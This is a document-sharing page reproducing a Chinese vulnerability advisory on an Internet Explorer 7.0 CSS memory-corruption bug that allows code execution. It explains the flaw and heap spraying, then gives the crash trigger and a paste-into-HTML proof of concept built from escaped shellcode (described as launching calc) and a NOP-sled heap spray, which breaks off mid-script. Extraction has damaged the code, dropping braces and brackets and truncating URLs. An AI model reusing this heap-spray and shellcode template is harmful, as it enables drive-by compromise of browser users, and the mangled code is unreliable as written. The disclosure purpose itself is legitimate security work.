Microsoft Internet Explorer 7.0 異常CSS導致內(nèi)存破壞漏洞(可以..……_第1頁
Microsoft Internet Explorer 7.0 異常CSS導致內(nèi)存破壞漏洞(可以..……_第2頁
Microsoft Internet Explorer 7.0 異常CSS導致內(nèi)存破壞漏洞(可以..……_第3頁
Microsoft Internet Explorer 7.0 異常CSS導致內(nèi)存破壞漏洞(可以..……_第4頁
Microsoft Internet Explorer 7.0 異常CSS導致內(nèi)存破壞漏洞(可以..……_第5頁
已閱讀5頁,還剩2頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)

文檔簡介

1、Microsoft Internet Explorer 異常CSS導致內(nèi)存破壞漏洞(可以執(zhí)行任意代碼)內(nèi)部漏洞編號 (YV20090432)特別注意:此漏洞報告來自南京銥迅信息技術(shù)有限公司,漏洞中的某些部分可能會威脅您的計算機,請?zhí)崆白龊糜嬎銠C數(shù)據(jù)備份,防止造成未知的后果!南京銥迅信息技術(shù)有限公司擁有最終解釋權(quán)。南京銥迅信息技術(shù)有限公司Nanjing Yxlink Information Technologies Co.,Ltd.目 錄一、漏洞介紹3二、相關(guān)名詞解釋4三、漏洞細節(jié)5四、漏洞利用6一、漏洞介紹1漏洞介紹在XHTML 1.0標準下,使用特殊構(gòu)造的CSS樣式,在Internet Ex

2、plorer 7.0 打開特定的網(wǎng)頁后,Internet Explorer 7.0將發(fā)生內(nèi)存崩潰,EIP指針將訪問0x70613e5b附近的內(nèi)存區(qū)域。如果將0x70613e5b附近覆蓋特殊的機器碼,就可以執(zhí)行任意命令。2漏洞危害(危害等級高)黑客如果將含有“漏洞利用程序的網(wǎng)頁”置于網(wǎng)站上,瀏覽過含有“漏洞利用程序的網(wǎng)頁”的客戶端將被運行特洛伊木馬。 二、相關(guān)名詞解釋1.XHTML 與 DTDXHTML 1.0 提供了三種DTD聲明可供選擇,其中一種叫做過渡的(Transitional)。過渡的(Transitional):要求非常寬松的DTD,它允許你繼續(xù)使用HTML4.01的標識(但是要符合

3、xhtml的寫法)。完整代碼如下:<!DOCTYPE html PUBLIC "-/W3C/DTD XHTML 1.0 Transitional/EN" "/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 2.Heap Spray傳統(tǒng)Heap Spray是使用javascript去分配內(nèi)存。根據(jù)heap spray的思想,就是用同樣的一個指令,去覆蓋一片大內(nèi)存地址,在每塊分配到的內(nèi)存最后,都付上我們的shellcode。當EIP指針訪問到大片的NOP指令后,將會走入Shellco

4、de中。CSS是Cascading Style Sheets(層疊樣式表)的簡稱. * CSS語言是一種標記語言,它不需要編譯,可以直接由瀏覽器執(zhí)行(屬于瀏覽器解釋型語言). * 在標準網(wǎng)頁設計中CSS負責網(wǎng)頁內(nèi)容(XHTML)的表現(xiàn). * CSS文件也可以說是一個文本文件,它包含了一些CSS標記,CSS文件必須使用css為文件名后綴. * 可以通過簡單的更改CSS文件,改變網(wǎng)頁的整體表現(xiàn)形式,可以減少我們的工作量,所以她是每一個網(wǎng)頁設計人員的必修課. * CSS是由W3C的CSS工作組產(chǎn)生和維護的.三、漏洞細節(jié)1、 使用XHTML標準 <!DOCTYPE HTML PUBLIC &qu

5、ot;-/W3C/DTD XHTML 1.0 Transitional/EN" "/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML xmlns="/1999/xhtml"> 2、 構(gòu)造導致IE 7.0 崩潰的CSS 與 JavaScript<HEAD><script> function load() var e; e=document.getElementsByTagName("STYLE

6、")0; e.outerHTML="1" </script> <STYLE type="text/css"> body overflow: scroll; margin: 0; </style> </HEAD> <BODY onload="load()"> </BODY></HTML>四、漏洞利用1. 通過此漏洞執(zhí)行Windows的calc命令示例(利用成功后將執(zhí)行計算器程序)<!-請將以下內(nèi)容粘貼到html文件中南京銥迅信息技術(shù)有限公

7、司(Nanjing Yxlink Information Technologies Co.,Ltd.)-><!DOCTYPE HTML PUBLIC "-/W3C/DTD XHTML 1.0 Transitional/EN" "/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML xmlns="/1999/xhtml"> <HEAD><script> function load()

8、 var e; e=document.getElementsByTagName("STYLE")0; e.outerHTML="1" </script> <STYLE type="text/css"> body overflow: scroll; margin: 0; </style> <SCRIPT language="javascript">var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%

9、u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%

10、uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");var bigblock = unescape("%u9090%u9090");var headersize = 20;var slackspace = headersize+shellcode.length;while (bigblock.length<slackspace) bigblock+=bigblock;fillblock = bigblock.substring(0, slackspace);block = bigblock.substring(0, bigblock.length-slackspace);while(block.length+slackspace<0x40000) block = block+block+fillblock;memor

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
  • 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論